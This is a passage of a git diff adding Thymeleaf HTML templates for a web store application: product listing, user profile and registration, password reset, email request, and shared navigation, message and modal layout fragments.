+                         class="card mx-auto bg-light center-block ui-helper-margin-top">
+                        <div class="ui-helper-margin-top">
+                            <span th:if="${#strings.isEmpty(comment.user.image)}" class="fas fa-user"></span>
+                            <img th:unless="${#strings.isEmpty(comment.user.image)}" 
+                                 th:src="@{/resources/{user}/{image}(user=${comment.user.userId},image=${comment.user.image})}" 
+                                 width="24" height="24"/> 
+                            <span class="font-weight-bold" th:text="${comment.user.name}"></span>
+                        </div>
+                        <div class="ui-helper-margin-top">
+                            <input type="text" class="rating-loading" th:value="${comment.rating}"/>
+                        </div>
+                        <div class="ui-helper-margin-top">
+                            <span class="font-weight-bold" th:text="#{comment.date}"></span>
+                            <span th:text="${#dates.format(comment.timestamp, 'yyyy-MM-dd hh:mm')}">
+                            </span>
+                        </div>
+                        <div class="ui-helper-margin-top ui-helper-margin-bottom">
+                            <span th:text="${comment.text}">
+                            </span>
+                        </div>
+                    </div>      
+                </div>
+            </div>
+        </div>
+        <div th:replace="layout/Footer :: #footer-fragment"></div>
+    </body>
+</html>
diff --git a/src/main/resources/templates/Products.html b/src/main/resources/templates/Products.html
new file mode 100644
index 0000000..c161945
--- /dev/null
+++ b/src/main/resources/templates/Products.html
@@ -0,0 +1,105 @@
+<!DOCTYPE HTML>
+<html>
+
+   <header th:replace="layout/Includes :: #include-fragment"></header>
+
+   <body>
+
+      <div th:replace="layout/NavBar :: #navbar-fragment"></div>
+
+      <script>
+         $(document).ready(function () {
+            doCreateRatings(true, 'sd');
+            $('table').DataTable({});
+            $('.form-check-input').on('change', function() {
+               location = '/products?category=' + encodeURIComponent($(this).val());
+            });
+         });
+      </script>
+
+      <div class="container profile">
+
+         <div th:replace="layout/Messages :: #messages-fragment"></div>
+         
+         <div class="row w-100 mx-auto">
+            <div class="col-3 desktop-only">
+               <div>
+                  <div>
+                     <p class="font-weight-bold filter-label">
+                        <i class="fa fa-filter"></i>
+                        Filter Products
+                     </p>
+                  </div>
+                  <div class="filter-panel">
+                     <ul class="list-group text-left">
+                        <li class="list-group-item">
+                           <div class="form-check">
+                              <label class="form-check-label">
+                                 <input type="radio" class="form-check-input" name="category" value=""
+                                        th:checked="${(param.category == null) or (param.category[0] == '')}">
+                                 All
+                              </label>
+                           </div>
+                        </li>
+                        <li class="list-group-item"
+                            th:each="category,status  : ${categories}">
+                           <div class="form-check">
+                              <label class="form-check-label">
+                                 <input type="radio" class="form-check-input" name="category" 
+                                        th:value="${category.name}"
+                                        th:checked="${param.category != null and param.category[0] == category.name}">
+                                 <span th:text="${category.name}"></span>
+                              </label>
+                           </div>
+                        </li>
+                     </ul>
+                  </div>
+               </div>
+
+            </div>
+            <div class="col">
+               <table class="table table-striped dt-responsive w-100" 
+                      data-order="[[ 6, &quot;asc&quot; ]]" th:if="${products.size() > 0}">
+                  <thead>
+                     <tr>
+                        <th data-priority="2" data-orderable="false" data-order="false"></th>
+                        <th data-priority="1" th:text="#{product.name}"></th>
+                        <th data-priority="5" th:text="#{product.description}"></th>
+                        <th data-priority="4" th:text="#{product.category}"></th>
+                        <th data-priority="3" th:text="#{product.rating}"></th>
+                        <th data-priority="3" th:text="#{product.total.sales}"></th>
+                        <th data-priority="2" th:text="#{product.price}"></th>
+                        <th data-priority="1" data-orderable="false"><i class="fas fa-search"></i></th>
+                     </tr>
+                  </thead>
+                  <tbody>
+                     <tr th:each="product,status  : ${products}">
+                        <td class="align-middle"><i class="fas" th:classappend="${product.icon}"></i></td>
+                        <td class="align-middle">
+                           <span th:text="${product.name}" th:title="${product.description}"></span>
+                        </td>
+                        <td th:text="${product.description}"></td>
+                        <td class="align-middle" th:text="${product.category.name}"></td>
+                        <td class="align-middle" th:attr="data-order=${product.rating}">
+                           <input type="text" class="rating-loading" th:value="${product.rating}"/>
+                        </td>
+                        <td class="align-middle"><span th:text="${product.sales}"></span></td>
+                        <td class="align-middle"><span th:text="${product.price}"></span><span>&euro;</span></td>
+                        <td class="align-middle">
+                           <form method="GET" th:action="@{/products/{id}(id=${product.productId})}">
+                              <button class="btn btn-sm btn-success" type="submit">
+                                 <i class="fa fa-search"></i>
+                              </button>
+                           </form>
+                        </td>
+                     </tr>
+                  </tbody>
+               </table>
+            </div>
+         </div>
+
+      </div>
+
+      <div th:replace="layout/Footer :: #footer-fragment"></div>
+   </body>
+</html>
diff --git a/src/main/resources/templates/Profile.html b/src/main/resources/templates/Profile.html
new file mode 100644
index 0000000..f7a04b4
--- /dev/null
+++ b/src/main/resources/templates/Profile.html
@@ -0,0 +1,192 @@
+<!DOCTYPE HTML>
+<html>
+
+   <header th:replace="layout/Includes :: #include-fragment"></header>
+
+   <body>
+      <div th:replace="layout/NavBar :: #navbar-fragment"></div>
+      <div th:replace="layout/Modal :: #modal-fragment"></div>
+
+      <script th:inline="javascript">
+         /*<![CDATA[*/
+         $(document).ready(function () {
+             doConfigureFormValidation();
+             $('#remove-image-link').click(function (e) {
+                 e.preventDefault();
+                 var message = /*[[#{confirm.remove.profile.image}]]*/ DEFAULT_CONFIRM_MESSAGE;
+                 doConfirm(message, function () {
+                     $('#remove-image-form').submit();
+                 });
+             });
+         });
+         /*]]>*/
+      </script>
+      <div class="container register">
+
+         <div class="row w-100 mx-auto">
+            <div class="col col-padding">
+               <div class="card mx-auto bg-light center-block ui-helper-margin-top">
+                  <div class="card-body">
+                     <div class="row">
+                        <div class="col-12 form-title">
+                           <h2 th:text="#{registration.title}" th:if="${session['user'] == null}"></h2>
+                           <h2 th:text="#{edit.profile.title}" th:unless="${session['user'] == null}"></h2>
+                        </div>
+                     </div>
+
+                     <div th:replace="layout/Messages :: #messages-fragment"></div>
+
+                     <form th:object="${userProfileForm}" class="form-horizontal" method="POST" 
+                           enctype="multipart/form-data">
+                        <div class="form-group row">
+                           <label for="name" class="col-3 text-right input-label-middle"
+                                  th:text="#{profile.input.name}"></label>
+                           <div class="input-group col-9 col-sm-6">
+                              <div class="input-group-prepend">
+                                 <span class="input-group-text"><i class="fas fa-user-circle"></i></span>
+                              </div>
+                              <input th:field="*{name}" type="text" class="form-control" id="name"
+                                     th:errorclass="error"
+                                     th:placeholder="#{profile.input.name.placeholder}"
+                                     data-validation="length alphanumeric"
+                                     data-validation-length="min4"
+                                     data-validation-error-msg-container="#input-name-error"
+                                     th:attr="data-validation-error-msg=#{profile.input.name.validation}">
+                           </div>
+                        </div>
+                        <div class="form-group row d-none">
+                           <div class="col-3"></div>
+                           <div class="col-9 text-left" id="input-name-error"></div>
+                        </div>
+                        <div class="form-group row">
+                           <label for="email" class="col-3 text-right input-label-middle"
+                                  th:text="#{profile.input.email}"></label>
+                           <div class="input-group col-9 col-sm-6">
+                              <div class="input-group-prepend">
+                                 <span class="input-group-text"><i class="fas fa-at"></i></span>
+                              </div>
+                              <input th:field="*{email}" type="email" class="form-control" id="email" name="email"
+                                     aria-describedby="emailHelp"
+                                     th:placeholder="#{profile.input.email.placeholder}"
+                                     th:errorclass="error"
+                                     data-validation-error-msg-container="#input-email-error"
+                                     data-validation="email"
+                                     th:attr="data-validation-error-msg=#{profile.input.email.validation}">
+                           </div>
+                           <div class="d-none d-sm-block col-sm-3">
+                              <small id="emailHelp" class="form-text text-muted text-left"
+                                  th:text="#{profile.input.email.tip}"></small>
+                           </div>
+                        </div>
+                        <div class="form-group row d-none">
+                           <div class="col-3"></div>
+                           <div class="col-9 text-left" id="input-email-error"></div>
+                        </div>
+                        <div class="form-group row" th:if="${session['user'] == null}">
+                           <label for="password_confirmation" class="col-3 text-right input-label-middle"
+                                  th:text="#{profile.input.password}"></label>
+                           <div class="input-group col-9 col-sm-6">
+                              <div class="input-group-prepend">
+                                 <span class="input-group-text"><i class="fas fa-lock"></i></span>
+                              </div>
+                              <input type="password" class="form-control"
+                                     id="password_confirmation" name="password_confirmation"
+                                     th:placeholder="#{profile.input.password.placeholder}"
+                                     data-validation-error-msg-container="#input-password-confirmation-error"
+                                     data-validation="length" data-validation-length="min4"
+                                     th:attr="data-validation-error-msg=#{profile.input.password.validation}">
+                           </div>
+                        </div>
+                        <div class="form-group row d-none" th:if="${session['user'] == null}">
+                           <div class="col-3"></div>
+                           <div class="col-9 text-left" id="input-password-confirmation-error"></div>
+                        </div>
+                        <div class="form-group row" th:if="${session['user'] == null}">
+                           <label for="password" class="col-3 text-right input-label-middle"
+                                  th:text="#{profile.input.password.confirm}"></label>
+                           <div class="input-group col-9 col-sm-6">
+                              <div class="input-group-prepend">
+                                 <span class="input-group-text"><i class="fas fa-redo"></i></span>
+                              </div>
+                              <input type="password" class="form-control"
+                                     id="password" name="password"
+                                     th:placeholder="#{profile.input.password.confirm.placeholder}"
+                                     data-validation-error-msg-container="#input-password-error"
+                                     data-validation="confirmation"
+                                     th:attr="data-validation-error-msg=#{profile.input.password.confirm.validation}">
+                           </div>
+                        </div>
+                        <div class="form-group row d-none" th:if="${session['user'] == null}">
+                           <div class="col-3"></div>
+                           <div class="col-9 text-left" id="input-password-error"></div>
+                        </div>
+                        <div class="form-group row">
+                           <label for="address" class="col-3 text-right" th:text="#{profile.input.address}">
+                           </label>
+                           <div class="input-group col-9 col-sm-6">
+                              <textarea th:field="*{address}" class="form-control" id="address" name="address" rows="3"
+                                        th:errorclass="error"
+                                        data-validation-error-msg-container="#input-address-error"
+                                        data-validation="required"
+                                 th:attr="data-validation-error-msg=#{profile.input.address.validation}">
+                              </textarea>
+                           </div>
+                        </div>
+                        <div class="form-group row d-none">
+                           <div class="col-3"></div>
+                           <div class="col-9 text-left" id="input-address-error"></div>
+                        </div>
+                        <div class="form-group row">
+                           <label for="image" class="col-3 text-right" th:text="#{profile.input.image}"></label>
+                           <div class="input-group col-9 col-sm-6">
+                              <input type="file" class="form-control-file" id="image" name="image"
+                                     th:field="*{image}"
+                                     th:errorclass="error"
+                                     data-validation-error-msg-container="#input-image-error"
+                                     th:attr="data-validation-error-msg=#{profile.input.image.validation}"
+                                     aria-describedby="imageHelp">
+                           </div>
+                           <div class="d-none d-sm-block col-sm-3">
+                              <small id="imageHelp" class="form-text text-muted text-left"
+                                     th:text="#{profile.input.image.tip}"></small>
+                           </div>
+                        </div>
+                        <div class="form-group row d-none">
+                           <div class="col-3"></div>
+                           <div class="col-9 text-left" id="input-image-error"></div>
+                        </div>
+                        <div class="form-group row" th:if="${session['user'] != null && !#strings.isEmpty(session['user'].image)}">
+                           <label for="image" class="col-3 text-right" 
+                                  th:text="#{profile.input.current.image}"></label>
+                           <div class="input-group col-6">
+                              <img th:src="@{/resources/{user}/{image}(user=${session['user'].userId},image=${session['user'].image})}" 
+                                   width="30" height="30"/>&nbsp;
+                              <a class="btn btn-outline-secondary btn-sm" href="/profile/image">
+                                 <i class="fas fa-download"></i>
+                              </a>&nbsp;
+                              <a class="btn btn-outline-secondary btn-sm" id="remove-image-link" href="#">
+                                 <i class="fas fa-trash-alt"></i>
+                              </a>
+                           </div>
+                           <div class="col-4">
+                           </div>
+                        </div>
+                        <div class="form-group row">
+                           <div class="col-4"></div>
+                           <div class="input-group col-8">
+                              <button th:if="${session['user'] == null}" type="submit" class="btn btn-primary"
+                                      th:text="#{registration.button}"></button>
+                              <button th:unless="${session['user'] == null}" type="submit" class="btn btn-primary"
+                                      th:text="#{edit.profile.button}"></button>
+                           </div>
+                        </div>
+                     </form>
+                     <form method="POST" action="/profile/image/remove" id="remove-image-form"></form>
+                  </div>
+               </div>
+            </div>
+         </div>
+      </div>
+      <div th:replace="layout/Footer :: #footer-fragment"></div>
+   </body>
+</html>
\ No newline at end of file
diff --git a/src/main/resources/templates/ResetPassword.html b/src/main/resources/templates/ResetPassword.html
new file mode 100644
index 0000000..ee235df
--- /dev/null
+++ b/src/main/resources/templates/ResetPassword.html
@@ -0,0 +1,98 @@
+<!DOCTYPE HTML>
+<html>
+
+   <header th:replace="layout/Includes :: #include-fragment"></header>
+
+   <body>
+      <div th:replace="layout/NavBar :: #navbar-fragment"></div>
+
+      <script>
+         $(document).ready(function () {
+             doConfigureFormValidation();
+         });
+      </script>
+
+      <div class="container resetPassword">
+
+         <div class="row w-100 mx-auto">
+            <div class="col col-padding">
+               <div class="card mx-auto bg-light center-block ui-helper-margin-top">
+                  <div class="card-body">
+                     <div class="row">
+                        <div class="col-12 form-title">
+                           <h2 th:text="#{reset.password.title}"></h2>
+                        </div>
+                     </div>
+
+                     <div th:replace="layout/Messages :: #messages-fragment"></div>
+
+                     <form th:object="${resetPasswordForm}" 
+                           th:action="@{/resetPassword}"
+                           class="form-horizontal toggle-disabled" method="POST">
+                        
+                        <input type="hidden" th:field="*{token}" />
+                        <input type="hidden" th:field="*{email}" />
+
+                        <div class="form-group row">
+                           <label for="password_confirmation" class="col-3 text-right input-label-middle"
+                                  th:text="#{reset.password.new.password}"></label>
+                           <div class="input-group col-8 col-sm-6">
+                              <div class="input-group-prepend">
+                                 <span class="input-group-text"><i class="fas fa-lock"></i></span>
+                              </div>
+                              <input type="password" class="form-control"
+                                     id="password_confirmation" name="password_confirmation"
+                                     th:placeholder="#{profile.input.password.placeholder}"
+                                     data-validation-error-msg-container="#input-password-confirmation-error"
+                                     data-validation="length" data-validation-length="min4"
+                                     th:attr="data-validation-error-msg=#{profile.input.password.validation}">
+                           </div>
+                        </div>
+                        <div class="form-group row d-none">
+                           <div class="col-3"></div>
+                           <div class="col-9 text-left" id="input-password-confirmation-error"></div>
+                        </div>
+
+                        <div class="form-group row">
+                           <label for="password" class="col-3 text-right input-label-middle"
+                                  th:text="#{profile.input.password.confirm}"></label>
+                           <div class="input-group col-8 col-sm-6">
+                              <div class="input-group-prepend">
+                                 <span class="input-group-text"><i class="fas fa-redo"></i></span>
+                              </div>
+                              <input type="password" class="form-control"
+                                     id="password" name="password"
+                                     th:placeholder="#{profile.input.password.confirm.placeholder}"
+                                     data-validation-error-msg-container="#input-password-error"
+                                     data-validation="confirmation"
+                                     th:attr="data-validation-error-msg=#{profile.input.password.confirm.validation}">
+                           </div>
+                        </div>
+                        <div class="form-group row d-none">
+                           <div class="col-3"></div>
+                           <div class="col-9 text-left" id="input-password-error"></div>
+                        </div>
+
+                        <div class="form-group row">
+                           <div class="col-3"></div>
+                           <div class="input-group col-9">
+                              <button type="submit" class="btn btn-primary" th:text="#{reset.password.button}">
+                              </button>
+                           </div>
+                        </div>
+                     </form>
+
+                  </div>
+               </div>
+            </div>
+         </div>
+
+
+      </div>
+
+   </div>
+
+   <div th:replace="layout/Footer :: #footer-fragment"></div>
+</body>
+</html>
+
diff --git a/src/main/resources/templates/SendEmail.html b/src/main/resources/templates/SendEmail.html
new file mode 100644
index 0000000..7cd8301
--- /dev/null
+++ b/src/main/resources/templates/SendEmail.html
@@ -0,0 +1,72 @@
+<!DOCTYPE HTML>
+<html>
+
+   <header th:replace="layout/Includes :: #include-fragment"></header>
+
+   <body>
+      <div th:replace="layout/NavBar :: #navbar-fragment"></div>
+
+      <script>
+         $(document).ready(function () {
+             doConfigureFormValidation();
+         });
+      </script>
+
+      <div class="container login">
+
+         <div class="row w-100">
+            <div class="col col-padding">
+               <div class="card mx-auto bg-light center-block ui-helper-margin-top">
+                  <div class="card-body">
+
+                     <div class="row">
+                        <div class="col-12 form-title">
+                           <h2 th:text="#{send.email.title}"></h2>
+                        </div>
+                     </div>
+
+                     <div th:replace="layout/Messages :: #messages-fragment"></div>
+
+                     <form  class="form-horizontal toggle-disabled" method="POST">
+                        <div class="form-group row">
+                           <label for="email" class="d-none d-sm-block col-sm-3 text-right input-label-middle"
+                                  th:text="#{profile.input.email}"></label>
+                           <div class="input-group col-12 col-sm-6">
+                              <div class="input-group-prepend">
+                                 <span class="input-group-text"><i class="fas fa-at"></i></span>
+                              </div>
+                              <input type="email" class="form-control" id="email" name="email"
+                                     th:placeholder="#{profile.input.email.placeholder}"
+                                     data-validation-error-msg-container="#input-email-error"
+                                     data-validation="email"
+                                     th:attr="data-validation-error-msg=#{profile.input.email.validation}">
+                           </div>
+                        </div>
+                        <div class="form-group row d-none">
+                           <div class="d-none d-sm-block col-sm-3"></div>
+                           <div class="col-12 col-sm-6 text-left" id="input-email-error"></div>
+                        </div>
+
+                        <div class="form-group row">
+                           <div class="d-none d-sm-block col-sm-3"></div>
+                           <div class="d-inline col-12 col-sm-6">
+                              <button type="submit" class="btn btn-primary">
+                                 <i class="fa fa-envelope"></i>
+                                 <span th:text="#{send.email.button}"></span>
+                              </button>
+                           </div>
+                        </div>
+                     </form>
+
+                  </div>
+               </div>
+            </div>
+         </div>
+
+      </div>
+
+   </div>
+
+   <div th:replace="layout/Footer :: #footer-fragment"></div>
+</body>
+</html>
diff --git a/src/main/resources/templates/layout/Footer.html b/src/main/resources/templates/layout/Footer.html
new file mode 100644
index 0000000..319e152
--- /dev/null
+++ b/src/main/resources/templates/layout/Footer.html
@@ -0,0 +1,7 @@
+<!DOCTYPE html>
+<html>
+   <body>
+      <footer class="footer " id="footer-fragment">
+      </footer>
+   </body>
+</html>
\ No newline at end of file
diff --git a/src/main/resources/templates/layout/Includes.html b/src/main/resources/templates/layout/Includes.html
new file mode 100644
index 0000000..c722e20
--- /dev/null
+++ b/src/main/resources/templates/layout/Includes.html
@@ -0,0 +1,30 @@
+<!DOCTYPE html>
+<html xmlns="http://www.w3.org/1999/xhtml" xmlns:th="http://www.thymeleaf.org">
+   <head id='include-fragment'>
+
+      <title>Web Store</title>
+      <meta charset="utf-8">
+      <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
+      <meta name="viewport" content="width=device-width, initial-scale=1"/>
+      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
+
+      <link href="/webjars/bootstrap/css/bootstrap.css" rel="stylesheet" />
+      <link href="/webjars/jquery-form-validator/form-validator/theme-default.min.css" rel="stylesheet"/>
+      <link href="/webjars/datatables/css/dataTables.bootstrap4.min.css" rel="stylesheet" />
+      <link href="/webjars/bootstrap-star-rating/css/star-rating.min.css" rel="stylesheet" />
+      <link href="/Styles.css" rel="stylesheet" />
+      
+      <script src="/webjars/jquery/jquery.min.js"></script>
+      <script src="/webjars/bootstrap/js/bootstrap.min.js"></script>
+      <script src="/webjars/font-awesome/svg-with-js/js/fontawesome-all.js"></script>
+      <script src="/webjars/jquery-form-validator/form-validator/jquery.form-validator.min.js"></script>
+      <script src="/webjars/datatables/js/jquery.dataTables.min.js"></script>
+      <script src="/webjars/datatables/js/dataTables.bootstrap4.min.js"></script>
+      <script src="/webjars/datatables-responsive/js/dataTables.responsive.js"></script>
+      <script src="/webjars/datatables-responsive/js/responsive.bootstrap4.js"></script>
+      <script src="/webjars/bootstrap-star-rating/js/star-rating.min.js"></script>
+      <script src="/webjars/jquery.inputmask/min/jquery.inputmask.bundle.min.js"></script>
+      <script src="/Scripts.js"></script>
+      
+   </head>
+</html>
diff --git a/src/main/resources/templates/layout/Messages.html b/src/main/resources/templates/layout/Messages.html
new file mode 100644
index 0000000..184cb32
--- /dev/null
+++ b/src/main/resources/templates/layout/Messages.html
@@ -0,0 +1,33 @@
+<!DOCTYPE html>
+<html>
+   <body>
+      <div id='messages-fragment'>
+         
+         <div th:if="${errorMessage != null}"  class="row w-100 mx-auto">
+            <div class="col">
+               <div class="alert alert-danger">
+                  <span th:text="${errorMessage}"></span>
+               </div>               
+            </div>
+         </div>
+
+         <div th:if="${successMessage != null}"  class="row w-100 mx-auto">
+            <div class="col">
+               <div class="alert alert-success">
+                  <span th:text="${successMessage}"></span>
+               </div>               
+            </div>
+         </div>
+
+         <div th:if="${warningMessage != null}"  class="row w-100 mx-auto">
+            <div class="col">
+               <div class="alert alert-warning">
+                  <span th:text="${warningMessage}"></span>
+               </div>               
+            </div>
+         </div>
+         
+      </div>
+   </body>
+</html>
+
diff --git a/src/main/resources/templates/layout/Modal.html b/src/main/resources/templates/layout/Modal.html
new file mode 100644
index 0000000..86391f8
--- /dev/null
+++ b/src/main/resources/templates/layout/Modal.html
@@ -0,0 +1,28 @@
+<!DOCTYPE html>
+<html>
+   <body>
+      <div id='modal-fragment'>
+         <div class="modal fade" tabindex="-1" role="dialog">
+            <div class="modal-dialog modal-dialog-centered" role="document">
+               <div class="modal-content">
+                  <div class="modal-header">
+                     <h5 class="modal-title" th:text="#{confirm.title}"></h5>
+                     <button type="button" class="close" data-dismiss="modal" aria-label="Close">
+                        <span aria-hidden="true">&times;</span>
+                     </button>
+                  </div>
+                  <div class="modal-body">
+                     <p></p>
+                  </div>
+                  <div class="modal-footer">
+                     <button type="button" class="btn btn-primary" th:text="#{confirm.yes}"></button>
+                     <button type="button" class="btn btn-secondary" data-dismiss="modal" 
+                             th:text="#{confirm.no}"></button>
+                  </div>
+               </div>
+            </div>
+         </div>
+      </div>
+   </body>
+</html>
+
diff --git a/src/main/resources/templates/layout/NavBar.html b/src/main/resources/templates/layout/NavBar.html
new file mode 100644
index 0000000..31f92ed
--- /dev/null
+++ b/src/main/resources/templates/layout/NavBar.html
@@ -0,0 +1,103 @@
+<!DOCTYPE html>
+<html>
+   <body>
+      <div id='navbar-fragment'>
+         <nav class="navbar fixed-top navbar-expand-lg navbar-light bg-light border">
+            <a class="navbar-brand" href="/">
+               <span class="fa-layers fa-3x">
+                  <i class="fa fa-circle"></i>
+                  <i class="fas fa-shopping-cart fa-inverse" data-fa-transform="shrink-8 left-1.25"></i>
+               </span>
+            </a>
+            <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarContent" 
+                    aria-controls="navbarContent" aria-expanded="false" aria-label="Toggle navigation">
+               <span class="navbar-toggler-icon"></span>
+            </button>
+
+            <div class="collapse navbar-collapse" id="navbarContent">
+               <ul class="navbar-nav mr-auto">
+                  
+                   <li class="nav-item" th:if="${session['user'] != null}">
+                     <span class="text-muted">
+                        <span th:if="${#strings.isEmpty(session['user'].image)}" class="fas fa-user"></span>
+                        <img th:unless="${#strings.isEmpty(session['user'].image)}" 
+                             th:src="@{/resources/{user}/{image}(user=${session['user'].userId},image=${session['user'].image})}" 
+                             width="24" height="24"/> 
+                        <span th:text="${session['user'].name}"></span>
+                        (<span th:text="${session['user'].email}"></span>)
+                     </span>
+                  </li>
+                  
+                  <li class="nav-item">
+                     <a class="nav-link" href="/">
+                        <span class="fas fa-home"></span>
+                        <div th:text="#{navbar.home}"></div>
+                     </a>
+                  </li>
+                  <li class="nav-item">
+                     <a class="nav-link" href="/products">
+                        <span class="fas fa-search"></span>
+                        <div th:text="#{navbar.products}"></div>
+                     </a>
+                  </li>
+               </ul>
+
+               <ul class="navbar-nav">
+                  <li class="nav-item">
+                     <a class="nav-link align-items-center" href="/cart">
+                        <span class="fas fa-shopping-cart"></span>
+                        <div><span th:text="#{navbar.cart}"></span>
+                           (<b th:text="${session['shoppingCart'].products.size()}"></b>)</div>
+                     </a>
+                  </li>
+               </ul>
+               
+               <ul class="navbar-nav" th:if="${session['user'] == null}">
+                  <li class="nav-item">
+                     <a class="nav-link" href="/login">
+                        <span class="fas fa-sign-in-alt"></span>
+                        <div th:text="#{navbar.login}"></div>
+                     </a>
+                  </li>
+
+                  <li class="nav-item">
+                     <a class="nav-link" href="/registration">
+                        <span class="fas fa-user-plus"></span>
+                        <div th:text="#{navbar.register}"></div>
+                     </a>
+                  </li>
+               </ul>
+               <ul class="navbar-nav" th:unless="${session['user'] == null}">
+                  <li class="nav-item">
+                     <a class="nav-link" href="/orders">
+                        <span class="fas fa-credit-card"></span>
+                        <div th:text="#{navbar.orders}"></div>
+                     </a>
+                  </li>
+                  <li class="nav-item dropdown">
+                     <a class="nav-link dropdown-toggle" href="#" id="account-dropdown"
+                        role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
+                        <span class="fas fa-user-circle"></span>
+                        <br/><span th:text="#{navbar.account}"></span>
+                     </a>
+                     <div class="dropdown-menu dropdown-menu-right" aria-labelledby="account-dropdown">
+                        <a class="dropdown-item" href="/profile">
+                           <span class="fas fa-address-card"></span>&nbsp;
+                           <span th:text="#{navbar.profile}"></span></a>
+                        <a class="dropdown-item" href="/changePassword">
+                           <span class="fas fa-lock"></span>&nbsp;
+                           <span th:text="#{navbar.password}"></span></a>
+                     </div>                  
+                  </li>
+                  <li class="nav-item">
+                     <a class="nav-link" href="/logout">
+                        <span class="fas fa-sign-out-alt"></span>
+                        <div th:text="#{navbar.logout}"></div>
+                     </a>
+                  </li>
+               </ul>
+            </div>
+         </nav>
+      </div>
+   </body>
+</html>